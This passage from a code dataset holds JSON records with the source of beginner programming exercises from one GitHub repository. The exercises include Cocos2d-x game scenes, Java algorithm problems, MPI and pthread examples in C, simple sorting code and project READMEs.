this));\n\n\tstart->setPosition(Vec2(origin.x + stone->getPositionX(),\n\t\t\t\t\t origin.y + stone->getPositionY() + 50));\n\n\t// create menu, it's an autorelease object\n\tauto menu = Menu::create(start, NULL);\n\tmenu->setPosition(Vec2(0, 0));\n\tthis->addChild(menu, 1);\n\n\n return true;\n}\n\nvoid MenuSence::menuStartCallback(Ref* pSender)\n{\n\tDirector::getInstance()->replaceScene( TransitionFade::create(2, GameSence::createScene(), Color3B(255,255,255)));\n}\n\n\n" }, { "alpha_fraction": 0.4935806095600128, "alphanum_fraction": 0.5007132887840271, "avg_line_length": 32.42856979370117, "blob_id": "9b6a7e198a1d1f2853455f98583848582e072a62", "content_id": "508cec194fe2860948a9c53bbec3cdf2644aeaa9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 701, "license_type": "permissive", "max_line_length": 81, "num_lines": 21, "path": "/java/projects/algorithms/chapter1/part1/Q3.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.Collection;\nimport java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.stream.Collectors;\n\nclass Q3 {\n public static void main(String[] args) {\n assert (args.length > 1);\n int result = Arrays.asList(args)\n .stream()\n .map(x -> {\n return Integer.parseInt(x) == Integer.parseInt(args[0]);\n })\n .collect(Collectors.toList()).stream()\n .map(x -> x ? 1 : 0)\n .mapToInt(Integer::intValue)\n .sum();\n System.out.print(args.length == result ? \"equal\": \"not equal\");\n }\n}" }, { "alpha_fraction": 0.6347032189369202, "alphanum_fraction": 0.6369863152503967, "avg_line_length": 19.904762268066406, "blob_id": "ab15e70d89d3fc018fb943e885720faebb46855c", "content_id": "20e208810d1db73bcb85134ba9484a4ee133b3d7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 438, "license_type": "permissive", "max_line_length": 50, "num_lines": 21, "path": "/c/projects/MPI/hardway/MPI_barrier.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n double start, finish;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n start = MPI_Wtime();\n MPI_Barrier(MPI_COMM_WORLD);\n printf(\"I'm rank %d of %d\", myid, numprocs);\n finish = MPI_Wtime();\n printf(\"running %f seconds.\\n\", finish - start);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.30779391527175903, "alphanum_fraction": 0.3778071403503418, "avg_line_length": 17.487804412841797, "blob_id": "ca099387ef9a1840ebfe2a01e804f3ad6f53e64b", "content_id": "95806184b9307fa1dbcad923b7853c4ee3b0edbc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 757, "license_type": "permissive", "max_line_length": 42, "num_lines": 41, "path": "/java/projects/algorithms/chapter1/part1/Q7.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q7\n */\n\npublic class Q7 {\n public static void main(String[] args) {\n // a\n TestCodes.test(() -> {\n double t = 9.0;\n while (Math.abs(t - 9.0/t) > .001) {\n t = (9.0/t + t) / 2.0;\n }\n System.out.printf(\"%.5f\", t);\n return 0;\n }, \"3.00009\");\n\n // b\n TestCodes.test(() -> {\n int sum = 0;\n for (int i = 0; i < 1000; i++) {\n for (int j = 0; j < i; j++) {\n sum++;\n }\n }\n System.out.print(sum);\n return 0;\n }, \"499500\");\n\n // c\n TestCodes.test(() -> {\n int sum = 0;\n for (int i = 1; i < 1000; i*=2) {\n for (int j =0; j < 1000; j++ ) {\n sum++;\n }\n }\n System.out.print(sum);\n return 0;\n }, \"10000\");\n }\n}" }, { "alpha_fraction": 0.47074466943740845, "alphanum_fraction": 0.4893617033958435, "avg_line_length": 27.923076629638672, "blob_id": "7d57207d1a914bad129121b05e709a331449efd3", "content_id": "c8b4bcfd3af6875f075a02938b2a4232b5433b87", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 376, "license_type": "permissive", "max_line_length": 63, "num_lines": 13, "path": "/c/hardwork/hardway/short_int_size.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main() {\n int x = 1;\n short int i = 2;\n float f = 3;\n if (sizeof((x == 2) ? f : i) == sizeof(float)) {\n printf(\"float\\n\");\n printf(\"%ld %ld\", sizeof((x == 2) ? f : i), sizeof(float));\n } else if (sizeof((x == 2) ? f : i) == sizeof(short int)) {\n printf(\"short int\\n\");\n printf(\"%ld %ld\", sizeof((x == 2) ? f : i), sizeof(float));\n }\n}\n" }, { "alpha_fraction": 0.6766917109489441, "alphanum_fraction": 0.7052631378173828, "avg_line_length": 27.95652198791504, "blob_id": "e22b54c91541f8e4cf29db714eb8bd77dd89cc2c", "content_id": "7079951da434d68787259ead30144c86477a4b91", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 665, "license_type": "permissive", "max_line_length": 127, "num_lines": 23, "path": "/cplusplus/projects/Cocos2dx/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# COCOS2DX\n`jskyzero` `2017/10/13`\n\n## Overview\nCocos2d-x is a suite of open-source, cross-platform, game-development tools used by thousands of developers all over the world.\n\n![framework_architecture](https://github.com/cocos2d/cocos2d-x/blob/v3/docs/framework_architecture.jpg)\n\n## Install & Run\n+ Download: You Can Download From [cocos2d-x.org](http://www.cocos2d-x.org/download)\n+ Install: \n ```\n python setup.py\n ```\n+ Initial a Cpp Project: \n ```\n cocos new project_name -l cpp\n ``` \n Because I install python3.x in windows, so I need to edit `cocos.bat` and change `python` to `py -2`\n\n## Reference\n\n+ [cocos2d-x.org/docs](http://cocos2d-x.org/docs/)" }, { "alpha_fraction": 0.4531722068786621, "alphanum_fraction": 0.47129908204078674, "avg_line_length": 15.550000190734863, "blob_id": "03509e5ef0c4bb6f9c63a843f783fe5e10215761", "content_id": "5e10c2379763ef79197b4faf76724f103b70ec40", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 331, "license_type": "permissive", "max_line_length": 70, "num_lines": 20, "path": "/c/hardwork/hardway/student_struct.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nstruct student {\n int n;\n int math;\n int english;\n int C;\n int total;\n} a[1005];\n\nint main() {\n int N, i;\n scanf(\"%d\", &N);\n for (i = 1; i <= N; i++) {\n scanf(\"%d %d %d %d\", &a[i].n, &a[i].math, &a[i].english, &a[i].C);\n a[i].total = a[i].n + a[i].math + a[i].english + a[i].C;\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.26337793469429016, "alphanum_fraction": 0.29933109879493713, "avg_line_length": 17.984127044677734, "blob_id": "a07bfd31288ea0530dde26dba96d4ccf57390683", "content_id": "822f0a3f2348c1c544ee857c91587d4d23afc4ea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1196, "license_type": "permissive", "max_line_length": 58, "num_lines": 63, "path": "/c/hardwork/hardway/1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n\nI don't know what is use for... orz\n\n\n*/\n#include <stdio.h>\n\nlong int a[500005];\n\nint main() {\n int t = 0;\n int z = 0;\n long int x = 0;\n long int y = 0;\n\n long int x0 = 0;\n long int y0 = 0;\n\n long int n = 0;\n long int m = 0;\n long int _x = 0;\n scanf(\"%d\", &t);\n for (int _t = 0; _t < t; _t++) {\n scanf(\"%ld %ld\", &n, &m);\n for (int _n = 1; _n <= n; _n++) a[_n] = _n;\n for (int _m = 0; _m < m; _m++) {\n scanf(\"%d %ld %ld\", &z, &x0, &y0);\n for (int i = 1; i <= n; i++) {\n if (x0 == a[i]) x = i;\n if (y0 == a[i]) y = i;\n }\n if (x < y) {\n for (int i = x; i <= y - 2; i++) {\n a[i] = a[i + 1];\n }\n if (1 == z) {\n a[y - 1] = x0;\n a[y] = a[y];\n }\n if (2 == z) {\n a[y - 1] = a[y];\n a[y] = x0;\n }\n } else {\n for (int i = x; i >= y + 2; i--) {\n a[i] = a[i - 1];\n }\n if (1 == z) {\n a[y + 1] = a[y];\n a[y] = x0;\n }\n if (2 == z) {\n a[y + 1] = x0;\n a[y] = a[y];\n }\n }\n }\n for (int _n = 1; _n <= n; _n++) printf(\"%ld \", a[_n]);\n printf(\"\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6083788871765137, "alphanum_fraction": 0.619307816028595, "avg_line_length": 18.60714340209961, "blob_id": "167b22a645ac67cd9f77328c956f90e30b5fc5ad", "content_id": "26716291782140c085148184896b81d27062211f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 643, "license_type": "permissive", "max_line_length": 83, "num_lines": 28, "path": "/c/projects/MPI/hardway/MPI_reduce.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 对于数据做同一种操作,并将结果返回到指定的进程中,这个过程称为集合通信。\n\n#include <stdio.h>\n#include <mpi.h>\n\nint main(int argc, char **argv)\n{\n\tint myid, numprocs;\n\tdouble local_num = 3.0; \n\n\tMPI_Init(&argc, &argv);\n\t\n\tMPI_Comm_rank(MPI_COMM_WORLD, &myid);\n\tMPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n \n double global_num;\n \n // 强烈安利使用linux 毕竟有补全\n MPI_Reduce(&local_num, &global_num, 1, MPI_DOUBLE, MPI_SUM, 0, MPI_COMM_WORLD);\n\n \n if(myid == 0) {\n \tprintf(\"Total sum = %f, avg = %f\\n\", global_num, global_num / numprocs);\n\t}\n\n\tMPI_Finalize();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5972222089767456, "alphanum_fraction": 0.5987654328346252, "avg_line_length": 26.02083396911621, "blob_id": "f3f889b40cc2383f5ad630014ef790d801f38857", "content_id": "8bdc288414cd4ab1467b10eb2092cf5cb8edb973", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Ant Build System", "length_bytes": 1296, "license_type": "permissive", "max_line_length": 73, "num_lines": 48, "path": "/java/hardwork/junit/build.xml", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "<project name=\"Hello\">\n\n<path id=\"classpath\">\n\t<pathelement location=\"junit-4.9.jar\" />\n</path>\n\n\t<target name=\"compile\">\n\t\t<javac srcdir=\".\" destdir=\".\" includeantruntime=\"false\"/>\n\t\t<classpath refid=\"classpath\"/>\n\t</target>\n\n\t<target name=\"test-compile\" depends=\"compile\">\n\t\t<javac srcdir=\".\" destdir=\".\" includeantruntime=\"false\">\n\t\t\t<classpath refid=\"classpath\"/>\n\t\t</javac>\n\t</target>\n\n\t<target name=\"test\" depends=\"test-compile\">\n\t\t<junit printsummary=\"on\" haltonfailure=\"yes\" fork=\"true\">\n\t\t\t<classpath>\n\t\t\t\t<path refid=\"classpath\"/>\n\t\t\t\t<pathelement location=\".\" />\n\t\t\t</classpath>\n\t\t\t<formatter type=\"brief\" usefile=\"false\" />\n\t\t\t<batchtest>\n\t\t\t\t<fileset dir=\".\" includes=\".\"/>\n\t\t\t</batchtest>\t\n\t\t</junit>\n\t</target>\n\n\t<target name=\"jar\">\n <jar destfile=\"${ant.project.name}.text.jar\" basedir=\".\">\n <manifest>\n <attribute name=\"Main-Class\" value=\"HelloWorldTest\"/>\n </manifest>\n </jar>\n </target>\n \n <target name=\"run\" description=\"run app\" depends=\"test-compile, jar\">\n <java jar=\"${ant.project.name}.text.jar\" fork=\"true\">\n \t<arg value=\"-ea org.junit.runner.JUnitCore\"/>\n \t<classpath>\n\t\t\t\t<path refid=\"classpath\"/>\n\t\t\t\t<pathelement location=\".\" />\n\t\t\t</classpath>\n </java>\n </target>\n</project>" }, { "alpha_fraction": 0.6157205104827881, "alphanum_fraction": 0.6157205104827881, "avg_line_length": 11.777777671813965, "blob_id": "629bf456520a99532936d21f09041abff60abbd2", "content_id": "1095ede57ada8d29ea2039a4519dc37a494f6cab", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 229, "license_type": "permissive", "max_line_length": 42, "num_lines": 18, "path": "/java/projects/gridworld/docs/Final_Part1/src/HelloWorld.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "public class HelloWorld\n{\n\tString str;\n\n\tpublic static void main(String[] args) {\n System.out.println(\"Hello world\");\n }\n\n\tpublic void hello()\n\t{\n\t\tstr = \"Hello World!\";\n\t}\n\n\tpublic String getStr()\n\t{\n\t\treturn str;\n\t}\n}" }, { "alpha_fraction": 0.6245551705360413, "alphanum_fraction": 0.6334519386291504, "avg_line_length": 29.37837791442871, "blob_id": "6cce68c52bbaa90ebb423461d391ce1a6ac85fad", "content_id": "0c954237b2bd51b8d7a42f94607238bafe22e594", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1124, "license_type": "permissive", "max_line_length": 93, "num_lines": 37, "path": "/java/projects/algorithms/chapter1/part1/Q15.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n/**\n * Q15\n */\n\nimport java.util.Scanner;\nimport java.util.ArrayList;\nimport java.util.Arrays;\n\npublic class Q15 {\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n int intputArraySize = 0, outputArraySize = 0;\n if (scanner.hasNextInt())\n outputArraySize = scanner.nextInt();\n if (scanner.hasNextInt())\n intputArraySize = scanner.nextInt();\n int[] inputArray = new int[intputArraySize];\n for (int i = 0; i < inputArray.length && scanner.hasNextInt(); i++)\n inputArray[i] = scanner.nextInt();\n\n int[] outputArray = histogram(inputArray, intputArraySize, outputArraySize);\n for (int i = 0; i < outputArray.length; i++)\n System.out.printf(\"index: %d times: %d\\n\", i, outputArray[i]);\n\n scanner.close();\n }\n\n public static int[] histogram(int[] inputArray, int intputArraySize, int outputArraySize) {\n int[] outputArray = new int[outputArraySize];\n Arrays.stream(inputArray)\n .forEach((x) -> {\n if (x >=0 && x < outputArray.length)\n outputArray[(int)x] += 1;\n });\n return outputArray;\n }\n}" }, { "alpha_fraction": 0.4005376398563385, "alphanum_fraction": 0.4448924660682678, "avg_line_length": 22.25, "blob_id": "70dfb186d6da7b7b8d6fb97e3a996d92378979e1", "content_id": "62b8731066eaab64b7f0bd90eb174965f6509c60", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 744, "license_type": "permissive", "max_line_length": 52, "num_lines": 32, "path": "/c/hardwork/hardway/sort(select).c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nvoid bubbleSort(double list[], int size) {\n double temp;\n for (int i = 0; i < size - 1; i++) {\n for (int j = 0; j < size - 1; j++) {\n if (list[j] > list[j + 1]) {\n temp = list[j];\n list[j] = list[j + 1];\n list[j + 1] = temp;\n }\n }\n }\n}\nvoid selectionSort(double list[], int arraySize) {\n double temp;\n for (int i = 0; i < arraySize - 1; i++) {\n for (int j = 0; j < arraySize - 1; j++) {\n if (list[j] > list[j + 1]) {\n temp = list[j];\n list[j] = list[j + 1];\n list[j + 1] = temp;\n }\n }\n }\n}\nint main() {\n double a[10] = {1, 3, 4, 5, 6, 2, 7, 8, 9, 10};\n selectionSort(a, 10);\n for (int i = 0; i < 10; i++) printf(\"%lf \", a[i]);\n return 0;\n}\n" }, { "alpha_fraction": 0.5098039507865906, "alphanum_fraction": 0.5196078419685364, "avg_line_length": 11.75, "blob_id": "1772a4771fe8ddc3af8a6d298e315983e81c5f72", "content_id": "52cc124a204f872b5cf866b16710d03e65c3d432", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 102, "license_type": "permissive", "max_line_length": 19, "num_lines": 8, "path": "/c/hardwork/hardway/short_int_print.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main() {\n short int i;\n scanf(\"%hd\", &i);\n printf(\"%hd\", i);\n return 0;\n}\n" }, { "alpha_fraction": 0.6981085538864136, "alphanum_fraction": 0.7157946228981018, "avg_line_length": 31.309524536132812, "blob_id": "0da0fe518791ca59f1cd4f5be629ef2f214dcfb4", "content_id": "c0803982738c06ed932c6d237d8d54ab5d3713bc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4073, "license_type": "permissive", "max_line_length": 103, "num_lines": 126, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week10/Classes/GameSence.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include \"GameSence.h\"\n\nUSING_NS_CC;\n\nScene* GameSence::createScene()\n{\n\t// 'scene' is an autorelease object\n\tauto scene = Scene::create();\n\n\t// 'layer' is an autorelease object\n\tauto layer = GameSence::create();\n\n\t// add layer as a child to scene\n\tscene->addChild(layer);\n\n\t// return the scene\n\treturn scene;\n}\n\n// on \"init\" you need to initialize your instance\nbool GameSence::init()\n{\n\n\tif (!Layer::init())\n\t{\n\t\treturn false;\n\t}\n\n\t//add touch listener\n\tEventListenerTouchOneByOne* listener = EventListenerTouchOneByOne::create();\n\tlistener->setSwallowTouches(true);\n\tlistener->onTouchBegan = CC_CALLBACK_2(GameSence::onTouchBegan, this);\n\tDirector::getInstance()->getEventDispatcher()->addEventListenerWithSceneGraphPriority(listener, this);\n\n\n\tSize visibleSize = Director::getInstance()->getVisibleSize();\n\tVec2 origin = Director::getInstance()->getVisibleOrigin();\n\n\tauto bg = Sprite::create(\"level-background-0.jpg\");\n\tbg->setPosition(Vec2(visibleSize.width / 2 + origin.x, visibleSize.height / 2 + origin.y));\n\tthis->addChild(bg, 0);\n\n\tauto stoneLayer = Layer::create();\n\tstoneLayer->setName(\"stoneLayer\");\n\tauto stone = Sprite::create(\"stone.png\");\n\tstone->setPosition(560, 480);\n\tstone->setName(\"stone\");\n\tauto cheese = Sprite::create(\"cheese.png\");\n\tcheese->setName(\"cheese\");\n\tcheese->setVisible(false);\n\tstoneLayer->addChild(cheese);\n\tstoneLayer->addChild(stone);\n\tthis->addChild(stoneLayer, 1);\n\n\tauto mouseLayer = Layer::create();\n\tmouseLayer->setName(\"mouseLayer\");\n\tauto mouse = Sprite::createWithSpriteFrameName(\"mouse-0.png\");\n\tmouse->setName(\"mouse\");\n\tAnimate* legAnimate = Animate::create(AnimationCache::getInstance()->getAnimation(\"mouseAnimation\"));\n\tmouse->runAction(RepeatForever::create(legAnimate));\n\tmouse->setPosition(origin.x + visibleSize.width / 2, origin.y + visibleSize.height / 2);\n\tmouseLayer->addChild(mouse);\n\tthis->addChild(mouseLayer, 1);\n\t\n\n\tauto label = Label::createWithTTF(\"Shoot\", \"fonts/arial.ttf\", 48);\n\tlabel->setName(\"shoot\");\n\tlabel->setPosition(Vec2(origin.x + visibleSize.width - label->getContentSize().width,\n\t\torigin.y + visibleSize.height - label->getContentSize().height));\n\tthis->addChild(label, 1);\n\n\n\treturn true;\n}\n\nbool GameSence::onTouchBegan(Touch *touch, Event *unused_event) {\n\n\tauto location = touch->getLocation();\n\t\n\tauto stoneLayer = this->getChildByName(\"stoneLayer\");\n\tauto mouseLayer = this->getChildByName(\"mouseLayer\");\n\tauto cheese = stoneLayer->getChildByName(\"cheese\");\n\tauto mouse = mouseLayer->getChildByName(\"mouse\");\n\tauto stone = stoneLayer->getChildByName(\"stone\");\n\tauto shoot = this->getChildByName(\"shoot\");\n\tRect rect = Rect(0, 0,\n\t\t\t\t\t shoot->getContentSize().width, shoot->getContentSize().height);\n\tif (rect.containsPoint(shoot->convertToNodeSpace(location))) {\n\t\tauto diamond = Sprite::create(\"diamond.png\");\n\t\tdiamond->setPosition(mouse->getPosition());\n\t\tstoneLayer->addChild(diamond);\n\n\t\tstone->cleanup();\n\t\tauto moveto = MoveTo::create(0.5, mouse->getPosition());\n\t\tauto fadein = FadeIn::create(0.5f);\n\t\tauto moveback = MoveTo::create(0.001f, Vec2(560, 480));\n\t\tauto fadeout = FadeOut::create(0.001f);\n\t\tauto seq0 = Sequence::create(moveto, fadeout, moveback, fadein, nullptr);\n\t\tstone->runAction(seq0);\n\n\t\tmouse->cleanup();\n\t\tfloat positionX = CCRANDOM_0_1() * Director::getInstance()->getVisibleSize().width;\n\t\tfloat positionY = CCRANDOM_0_1() * Director::getInstance()->getVisibleSize().height;\n\t\tauto randomMove = MoveTo::create(0.5, Vec2(positionX, positionY));\n\t\tmouse->runAction(randomMove);\n\t}\n\telse {\n\t\tcheese->cleanup();\n\t\tcheese->setPosition(location);\n\t\tcheese->setVisible(true);\n\t\tauto fadein = FadeIn::create(0.001f);\n\t\tauto delay = DelayTime::create(0.5);\n\t\tauto fadeout = FadeOut::create(0.001f);\n\t\tauto seq0 = Sequence::create(fadein, delay, fadeout,nullptr);\n\t\tcheese->runAction(seq0);\n\t\t\n\t\tmouse->cleanup();\n\t\tauto rotate = RotateBy::create(0.25, 360);\n\t\tauto moveto = MoveTo::create(0.5, location);\n\t\tauto action = Spawn::createWithTwoActions(moveto, rotate);\n\t\tauto seq = Sequence::create(action, nullptr);\n\t\tmouse->runAction(seq);\n\t}\n\n\treturn true;\n}\n" }, { "alpha_fraction": 0.53721684217453, "alphanum_fraction": 0.5760517716407776, "avg_line_length": 8.6875, "blob_id": "b4d34b04329d1bb504ede3d11ea0d46e6010a937", "content_id": "46c17cf8bd6b30f73a18bf468009b6a6c35e6500", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 405, "license_type": "permissive", "max_line_length": 36, "num_lines": 32, "path": "/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Languages\n`jskyzero` `2016/10/30`\n\n## Overview\n\nUse Program do things more efficient\n\n## Structure\n```shell\n+ \n.\n├── LICENSE\n├── R\n├── README.md\n├── bash\n├── c\n├── cplusplus\n├── csharp\n├── docs\n├── haskell\n├── java\n├── perl\n├── powershell\n├── python27\n├── python36\n├── scheme\n└── vala\n```\n\n## Reference\n\n..." }, { "alpha_fraction": 0.660764217376709, "alphanum_fraction": 0.6747437119483948, "avg_line_length": 27.263158798217773, "blob_id": "6235ca5ffaf103311377105c2513c4bfb552930a", "content_id": "af911d586a897dec6a974237ce8fbcff7fc59f30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1161, "license_type": "permissive", "max_line_length": 87, "num_lines": 38, "path": "/c/projects/MPI/hardway/MPI_group_operation.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 对于两个集合,我们经常对其进行各种各样的集合操作,例如交/并。\n// MPI同样提供了对组的集合类操作。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, union_rank;\n MPI_Group group_world, odd_group, even_group, union_group;\n int i;\n int members[10];\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n for (i = 0; i < numprocs / 2; i++) {\n members[i] = 2 * i + 1;\n }\n\n MPI_Group_incl(group_world, numprocs / 2, members, &odd_group);\n MPI_Group_excl(group_world, numprocs / 2, members, &even_group);\n\n // int MPI_Group_union(MPI_Group group1, MPI_Group group2, MPI_Group *newgroup)\n // int MPI_Group_intersection(MPI_Group group1,MPI_Group group2,MPI_Group *newgroup) \n // int MPI_Group_difference(MPI_Group group1,MPI_Group group2,MPI_Group *newgroup)\n MPI_Group_union(odd_group, even_group, &union_group);\n\n MPI_Group_rank(union_group, &union_rank);\n\n printf(\"In process %d: union rank is %d\\n\", myid, union_rank);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.5962587594985962, "alphanum_fraction": 0.6024941802024841, "avg_line_length": 26.29787254333496, "blob_id": "66032dd0c8c81fadd3cd2e2c8a64347b6519db86", "content_id": "92b3932fc69e51dd4ff4c81d6245e4d2bf505bce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1295, "license_type": "permissive", "max_line_length": 82, "num_lines": 47, "path": "/c/projects/POSIX/Lab2/2.0.helloworld.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <pthread.h> // for pthread_*, thread_*\n#include <assert.h> // for assert()\n\n// \nvoid* pthread_work(void* arguement) {\n // use type cast to get data from arguement\n char* print_str = (char*)arguement;\n // process data\n printf(\"%s\\n\", print_str);\n\n\n return NULL;\n}\n\nint main(int argc, char *argv[]) {\n pthread_t thread;\n pthread_attr_t attr;\n char thread_argument[] = \"Hello World!\"; \n pthread_attr_init(&attr);\n\n // Attention :\n // this will cause a abort in my macOS Sierra 10.12.02\n // I dont know why it can't set scope to process\n // Update: linux / Mac OS X 仅允许设置PTHREAD SCOPE SYSTEM。\n // assert(pthread_attr_setscope(&attr, PTHREAD_SCOPE_PROCESS) == 0 );\n\n // int s, i;\n // s = pthread_attr_getscope(&attr, &i);\n\n // printf(\"%sScope = %s\\n\", \"|\",\n // (i == PTHREAD_SCOPE_SYSTEM) ? \"PTHREAD_SCOPE_SYSTEM\" :\n // (i == PTHREAD_SCOPE_PROCESS) ? \"PTHREAD_SCOPE_PROCESS\" :\n // \"???\");\n\n // Create pthread\n int result_code = pthread_create(&thread, &attr, pthread_work, thread_argument);\n \n // printf(\"result code = %d\\n\", result_code);\n\n printf(\"In Main All threads completed\\n\");\n // block call \n // pthread_join(thread, NULL);\n // printf(\"Exit\\n\");\n \n return 0;\n}\n" }, { "alpha_fraction": 0.4146341383457184, "alphanum_fraction": 0.4451219439506531, "avg_line_length": 18.294116973876953, "blob_id": "6450fa0c407cba1a18b557a9eb9a266b26b2ee60", "content_id": "2be0141b5f98f8f3e4b6ea3cb43fab88fb4572e5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 328, "license_type": "permissive", "max_line_length": 40, "num_lines": 17, "path": "/c/projects/POSIX/Lab1/1.2.2.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void) {\n int i, a = 0;\n pid_t pid[2];\n for (i = 0; i < 2; i++) {\n if ((pid[i] = fork())) a = 1;\n // fork();\n // printf(\"X\");\n printf(\"X\\n\");\n }\n // if (pid[0] == 0) printf(\"%d\\n\", a);\n // if (pid[1] == 0) printf(\"%d\\n\", a);\n return 0;\n}\n" }, { "alpha_fraction": 0.6767764091491699, "alphanum_fraction": 0.6819757223129272, "avg_line_length": 25.227272033691406, "blob_id": "d6408766954214d49e35b1fa715c6c4bbb7dd246", "content_id": "379abae00293e46cc9568ca19e5e3431dd85167d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1154, "license_type": "permissive", "max_line_length": 74, "num_lines": 44, "path": "/c/projects/sniff/buffer.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#ifndef __BUFFER_H\n#define __BUFFER_H\n\n#include <pcap.h>\n#include <stdlib.h>\n#include <string.h>\n\n#define DEFAULT_CAPACITY 65536\n#define GARBAGE_SIZE (DEFAULT_CAPACITY / 2)\n/* an item in buffer contains packet header\n * and the full packet with additional info\n */\ntypedef struct __item {\n struct pcap_pkthdr* packet_header;\n u_char* full_packet;\n short int garbage; /* marked for collection */\n struct __item* prev; /* item in front */\n struct __item* next; /* next item */\n\n} item;\n\n/* buffer contains a doubly-linked list of items\n * and additional info\n */\ntypedef struct __buffer {\n long long int items; /* number of items currently in the list */\n long long int capacity; /* maximum capacity */\n long long int garbage_size; /* collect garbage when we hit this limit */\n\n item* header; /* head of the list */\n item* tail; /* tail of the list */\n\n} buffer;\n\n/* initialize the buffer */\nint create_buffer(buffer*, long long int, long long int);\n\n/* insert an item into the buffer */\nint append_item(buffer*, const struct pcap_pkthdr*, const u_char*);\n\n/* run garbage collection returns freed items */\nint gc(buffer*);\n\n#endif\n" }, { "alpha_fraction": 0.432110995054245, "alphanum_fraction": 0.47274529933929443, "avg_line_length": 26.97222137451172, "blob_id": "0f10ed86eabfe7df4236fd9c16549da7689ecee5", "content_id": "b23d0570e32bda86ae37106c8e2bfe797025aaae", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1009, "license_type": "permissive", "max_line_length": 64, "num_lines": 36, "path": "/c/hardwork/hardway/_two_dimension_array.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <assert.h> // for assert()\n\n\ntypedef int(*Array_Type)[4];\n\nvoid print_two_dimension_array(int(*array)[4], int array_size) {\n for (int i = 0; i < array_size; i++) {\n printf(\"%p-%ld\\n\", array[i], sizeof(array[i]));\n }\n printf(\"\\n\");\n}\n\nvoid print_two_dimension_pointer(int **array, int array_size) {\n for (int i = 0; i < array_size; i++) {\n printf(\"%p-%ld\\n\", array[i], sizeof(array[i]));\n }\n printf(\"\\n\");\n}\n\nint main() {\n int a[3][4] = {{1, 2}, {3, 4}, {5, 6, 7}};\n print_two_dimension_array(a, 3);\n print_two_dimension_pointer(a, 3);\n // this means a[m][n] == *(*(a + m) + n)\n // assert(a[0][1] == *(*(a + 0) + 1));\n printf(\"&a = %p\\n\", &a);\n 